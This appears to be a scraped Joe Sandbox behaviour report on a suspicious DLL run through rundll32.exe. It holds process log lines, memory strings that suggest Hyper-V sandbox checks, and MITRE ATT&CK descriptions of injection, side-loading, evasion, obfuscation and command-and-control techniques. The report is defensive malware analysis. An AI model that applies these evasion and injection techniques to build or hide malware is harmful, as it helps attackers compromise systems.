Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 1.9 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 3.3 %

Source: rundll32.exe, 00000007.00000003.1335961205.0000000002963000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337105449.0000000002968000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336429087.0000000002967000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: rundll32.exe, 00000005.00000003.1336028674.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1335749105.0000000002B53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336312907.0000000002B57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1337134914.0000000002B58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1335961205.0000000002963000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002962000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1336974130.0000000002935000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336229595.0000000002935000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.1337105449.0000000002968000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.1336429087.0000000002967000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000009.00000002.1369354017.0000000003340000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000005.00000003.1336352369.0000000002ADA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1336998419.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1336028674.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(

Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_5-1658
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_7-1645
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node	graph_9-1546

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HeOkukP.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Windows Analysis Report
HeOkukP.dll

Function 04C211A4 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Function 04C0387D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMON

Function 04BB387D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58
COMMON

Function 05648BC4 Relevance: 3.0, APIs: 2, Instructions: 21
memoryCOMMONLIBRARYCODE

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre